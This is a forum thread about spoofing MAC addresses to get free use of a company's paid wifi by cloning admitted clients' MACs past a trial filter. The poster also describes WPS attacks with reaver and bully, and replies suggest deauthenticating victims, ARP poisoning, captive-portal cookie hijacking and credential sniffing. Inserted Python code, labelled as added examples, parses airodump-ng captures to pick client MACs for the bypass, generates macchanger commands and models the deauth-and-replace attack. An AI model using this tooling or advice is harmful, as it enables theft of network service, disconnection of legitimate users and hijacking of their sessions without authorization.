Macchanger - Spoofing your MAC Address

Sorry, I've been doing a lot of studying as of late and was a little tired in the early hours last night, so let me further explain the setup. In said community, there's a wifi hotspot, well, from what I can see a bunch of them; it starts as an open network that proxies you to a login page. If you are not a member, you can sign up for a short free trial, which as far as I can tell is only filtered by MAC address, so I've been doing that. From what I've been able to tell, when you are an actual customer, you get a modem, which I believe to be a Cisco one, and then it looks to create their own personal wifi and ESSID, but from what I can tell (bear with me as I'm learning xD) it's still piggybacking on the same connection the open connections are coming from.

I'm going to do more dabbling today, but a point in the right direction would be awesome :slight_smile:

Last night after reading, I used airodump-ng and looked for these personal hotspots with devices on them, spoofed a device's MAC and saw what happened, which wasn't much of course because I still needed the router's WPA2 passphrase.

Another thing I've noticed is that the airodump scan returns results like so:

companywifi — this is the open wifi
eddieswifi — this is WPA2
randomwifi — this is WPA2

The odd thing is that these little clusters all carry the SAME MAC addresses except for maybe 1 or 2 varying numbers/letters. I'm sure these are all connected because of their signal power.

I've done a few reaver attacks on the WPS-enabled ones to no avail, as well as bully.

And unfortunately I have not cracked the WPA2 yet.

Sorry for the long post, but this setup is intriguing the hell out of me xD.

Oh, also, from what I can see the base router(s) pumping out the hotspots are WEP-based, but due to the size of this company, I did not want to dabble with that just quite yet.

Thanks,
doobs

1 Like
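To make the airodump-ng observations above concrete (clusters of near-identical BSSIDs, clients associated to the open trial SSID, then macchanger to clone one of them), here is an added example; it is not code from the original post or from any poster in the thread. It assumes airodump-ng's CSV dump layout (AP table, blank line, station table); the capture, ESSIDs, BSSIDs and client MACs are constructed, `wlan0` is a placeholder interface, and the clustering assumes the vendor derives one BSSID per SSID by varying only the last hex digit of a base MAC.

```python
"""Cluster airodump-ng output per radio and pick MAC-spoof candidates.

Added example for this thread, not any poster's code. Assumes the
airodump-ng CSV dump layout (AP table, blank line, station table) and a
constructed capture; ESSIDs, BSSIDs and client MACs are invented.
"""
import csv
import io
import re
from collections import defaultdict

# Constructed sample in airodump-ng's CSV layout (not a real capture).
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
AA:BB:CC:10:20:30, 2016-01-01 20:00:01, 2016-01-01 20:10:00,  6,  54, OPN ,      ,    , -41,      120,       0,   0.  0.  0.  0,  11, companywifi,
AA:BB:CC:10:20:31, 2016-01-01 20:00:01, 2016-01-01 20:10:00,  6,  54, WPA2, CCMP, PSK, -42,      118,       0,   0.  0.  0.  0,  10, eddieswifi,
AA:BB:CC:10:20:32, 2016-01-01 20:00:02, 2016-01-01 20:10:00,  6,  54, WPA2, CCMP, PSK, -43,      117,       0,   0.  0.  0.  0,  10, randomwifi,
AA:BB:CC:10:20:80, 2016-01-01 20:00:02, 2016-01-01 20:10:00, 11,  54, OPN ,      ,    , -70,       60,       0,   0.  0.  0.  0,  11, companywifi,
AA:BB:CC:10:20:81, 2016-01-01 20:00:02, 2016-01-01 20:10:00, 11,  54, WPA2, CCMP, PSK, -71,       59,       0,   0.  0.  0.  0,   8, bobswifi,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
DE:AD:BE:EF:00:01, 2016-01-01 20:00:05, 2016-01-01 20:09:59, -50,       300, AA:BB:CC:10:20:30, companywifi
DE:AD:BE:EF:00:02, 2016-01-01 20:00:06, 2016-01-01 20:09:59, -55,       120, AA:BB:CC:10:20:31, eddieswifi
DE:AD:BE:EF:00:03, 2016-01-01 20:00:07, 2016-01-01 20:09:59, -60,        40, (not associated), companywifi,guestnet
DE:AD:BE:EF:00:04, 2016-01-01 20:00:08, 2016-01-01 20:09:59, -72,        90, AA:BB:CC:10:20:80, companywifi
"""

MAC_RE = re.compile(r"^([0-9A-F]{2}:){5}[0-9A-F]{2}$", re.I)


def parse_airodump_csv(text):
    """Return (aps, stations) from an airodump-ng CSV dump.

    The AP table and the station table are separated by one blank line;
    header lines are skipped because their first field is not a MAC.
    """
    ap_part, _, sta_part = text.partition("\n\n")
    aps, stations = [], []
    for row in csv.reader(io.StringIO(ap_part), skipinitialspace=True):
        if len(row) < 14 or not MAC_RE.match(row[0]):
            continue
        aps.append({"bssid": row[0].upper(), "channel": int(row[3]),
                    "privacy": row[5].strip(), "power": int(row[8]),
                    "essid": row[13].strip()})
    for row in csv.reader(io.StringIO(sta_part), skipinitialspace=True):
        if len(row) < 6 or not MAC_RE.match(row[0]):
            continue
        stations.append({"mac": row[0].upper(), "power": int(row[3]),
                         "packets": int(row[4]), "bssid": row[5].strip()})
    return aps, stations


def cluster_radios(aps):
    """Group BSSIDs that differ only in the last hex digit on one channel.

    Multi-SSID access points usually mint one BSSID per SSID from a base
    MAC by varying the low bits, which is why a scan shows clusters of
    near-identical BSSIDs. Assumption: only the last nibble varies.
    """
    radios = defaultdict(list)
    for ap in aps:
        radios[(ap["bssid"][:-1], ap["channel"])].append(ap)
    return dict(radios)


def trial_bypass_candidates(aps, stations, open_essid):
    """Client MACs currently associated to the open SSID.

    A MAC-address-based free-trial filter has already admitted these; a
    spoofer would clone one of them while its owner is not on the air.
    """
    open_bssids = {ap["bssid"] for ap in aps
                   if ap["essid"] == open_essid and ap["privacy"] == "OPN"}
    return sorted((s["mac"], s["bssid"]) for s in stations
                  if s["bssid"] in open_bssids)


def macchanger_sequence(iface, mac):
    """Commands to clone `mac` onto `iface` (run as root; link must be down)."""
    return [f"ip link set dev {iface} down",
            f"macchanger -m {mac} {iface}",
            f"ip link set dev {iface} up",
            f"macchanger -s {iface}"]  # -s prints current vs permanent MAC


if __name__ == "__main__":
    aps, stations = parse_airodump_csv(SAMPLE_CSV)
    for (prefix, chan), group in cluster_radios(aps).items():
        print(f"radio {prefix}x ch{chan}:",
              ", ".join(f'{a["essid"]}[{a["privacy"]}]' for a in group))
    for mac, bssid in trial_bypass_candidates(aps, stations, "companywifi"):
        print("candidate", mac, "on", bssid)
        print("  " + " && ".join(macchanger_sequence("wlan0", mac)))
```

Run it as a script to print the per-radio clusters and the candidate MACs; `macchanger_sequence` only builds the command strings, so they can be reviewed before being run as root. The last-nibble rule is a heuristic: some vendors vary the last byte or flip the locally-administered bit instead, so check the OUI and channel before assuming two BSSIDs share a radio.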

@pry0cc I'm not saying it's impossible, but you are not that descriptive about how exactly you do it. Using a tool without knowing what's going on under the hood is a bit skiddy. Keep in mind MAC addresses are one of a kind (in 99% of cases). In serious networks, MAC spoofing is nearly impossible.

My deal is this:

  • Two computers are both online on the same network.
  • One computer is the rightful owner of some MAC address. This computer was connected to the network first.
  • Then I come along and change my MAC address to be the same as the other computer’s.

My questions:

  1. Do I get the same IP as the other guy if I do this, since the MAC is the same?
  2. How do I know if the packets are routed to the right machine?

There is no way two machines will be working properly if both of them are online and they are using the same MAC address. It just doesn't make any sense. The attack I've accomplished, at least, is by hijacking the ARP cache and then, when the target machine is offline, using its MAC address. Check out the command arp -a. This attack is also known as ARP poisoning.

@oaktree
To answer your questions from the experiences I've had:

  1. No, you don't get the same IP address; a normal router would recognize this and throw a duplicate IP error. Furthermore, you will get strange symptoms when two systems on the same subnet have the same IP address, because the packets are not forwarded correctly.

  2. What I noticed when I spoofed a MAC address was that it would deauthenticate the other user who was connected in the first place, maybe because their hotspot router thought "oh, the client with this known MAC address updated with a new IP" (maybe it has something to do with the TTL as well?). When the other, actual user connected again, I got deauthenticated.

This might not be the case for every hotspot/router, but it is what I experienced.
If I have the time I'm going to try this on my own network and then do a tcpdump with Wireshark. Then it should be clearer what is happening.
But again, some routers may behave differently.

That’s just what I experienced. I may be totally wrong though. If somebody knows more, please let me know.

2 Likes

You guys are funny. Thanks

1 Like

IMHO, you can't have two of the same MACs or IPs on the network, because you would get all types of switching problems (MACs) or collisions (IPs).

But what you could do (only in the case of wifi) is to deauth the victim and take its place on the network. Then the victim gets all the errors and connectivity problems, but if it's 'just a user', they will 'just think the net sucks'.
In this case, IP assignment is irrelevant, because the network most probably uses dynamic addressing, so the client addresses change relatively regularly.

In the case that network access is not controlled by some form of MAC filtering but by a Captive Portal (usn/psw), you can hijack a login cookie and use it to register on the network. The catch here is cookie validation in the Captive Portal, but in a lot of cases you'll see a cheap implementation of a CP, or a CP which runs on defaults.
Along the same line of thought, you could also sniff for credentials.

And in the thread there were mentions of other auth systems used in wifi implementations: if the network is using a directory-based SSO solution (AD+RADIUS (Kerberos), SAMBA+Kerberos), you'll have to obtain the creds from inside the network.

Those were my 2 cents, feedback welcome...

3 Likes
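The disagreement in this thread about two machines sharing one MAC, the deauth ping-pong one poster observed, and the "deauth the victim and take its place" approach in the last reply can all be replayed in a small model. This is an added example, not code from any poster; it simplifies 802.11 to one association slot per station MAC and to the access point's standard reaction to a data frame from a MAC it does not consider associated (a deauthentication carrying reason code 7, "class 3 frame received from nonassociated station"). The radio labels "victim" and "attacker" and the MAC address are invented for the simulation.

```python
"""Toy 802.11 access point: one association slot per station MAC.

Added example for this thread, not any poster's code. The AP cannot tell
two radios apart once they use the same MAC; whoever associated last owns
the slot and the other radio's next data frame earns a deauthentication.
Radio names and the MAC below are invented for the simulation.
"""

# IEEE 802.11 reason code sent when a data frame arrives from a station
# the AP does not have an association for.
REASON_CLASS3_NOT_ASSOC = 7


class AccessPoint:
    def __init__(self):
        self.assoc = {}    # station MAC -> radio currently holding the slot
        self.events = []   # trace of what the AP did, for inspection

    def associate(self, mac, radio):
        """(Re)association replaces whatever state the MAC had before."""
        old = self.assoc.get(mac)
        self.assoc[mac] = radio
        if old is not None and old != radio:
            self.events.append(("replaced", mac, old, radio))

    def deauth(self, mac, from_radio):
        """Deauth is an unprotected management frame (pre-802.11w), so the
        AP honours it no matter which radio actually transmitted it."""
        self.assoc.pop(mac, None)
        self.events.append(("deauth", mac, from_radio))

    def data_from(self, mac, radio, payload):
        """Uplink data frame. Returns 'ok', or the reason code the AP
        sends back in a deauthentication when the MAC is not associated
        from this radio."""
        if self.assoc.get(mac) != radio:
            self.events.append(("deauth-sent", mac, radio,
                                REASON_CLASS3_NOT_ASSOC))
            return REASON_CLASS3_NOT_ASSOC
        return "ok"

    def slot_owner(self, mac):
        """Which radio the AP currently believes this MAC is."""
        return self.assoc.get(mac)


def scenario_share_mac():
    """Two radios, one MAC, both trying to stay online: they evict each other."""
    ap = AccessPoint()
    mac = "DE:AD:BE:EF:00:01"           # invented client MAC
    log = []
    ap.associate(mac, "victim")
    log.append(("victim", ap.data_from(mac, "victim", "GET /")))     # ok
    ap.associate(mac, "attacker")                                    # slot taken
    log.append(("victim", ap.data_from(mac, "victim", "GET /")))     # 7: kicked
    ap.associate(mac, "victim")                                      # auto-reconnect
    log.append(("attacker", ap.data_from(mac, "attacker", "GET /"))) # 7: kicked
    return log


def scenario_deauth_then_replace():
    """Deauth the victim first, then take the slot; it holds until the
    victim's supplicant reconnects."""
    ap = AccessPoint()
    mac = "DE:AD:BE:EF:00:01"
    ap.associate(mac, "victim")
    ap.deauth(mac, from_radio="attacker")     # spoofed deauth, victim drops
    ap.associate(mac, "attacker")
    return [ap.data_from(mac, "attacker", "GET /"),   # ok
            ap.data_from(mac, "victim", "GET /"),     # 7: no longer associated
            ap.slot_owner(mac)]                       # 'attacker'


if __name__ == "__main__":
    for who, result in scenario_share_mac():
        print(f"shared MAC, frame from {who}: {result}")
    print("deauth then replace:", scenario_deauth_then_replace())
```

The model explains the ping-pong reported earlier in the thread without any IP-layer involvement: the AP keeps exactly one association per MAC, so each reconnect by either party evicts the other. It also shows why the deauth-first variant only buys time; the moment the victim's wireless client retries, the attacker is evicted in turn. Access points with 802.11w (protected management frames) would drop the spoofed deauth, which the model does not account for.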

This topic was automatically closed after 30 days. New replies are no longer allowed.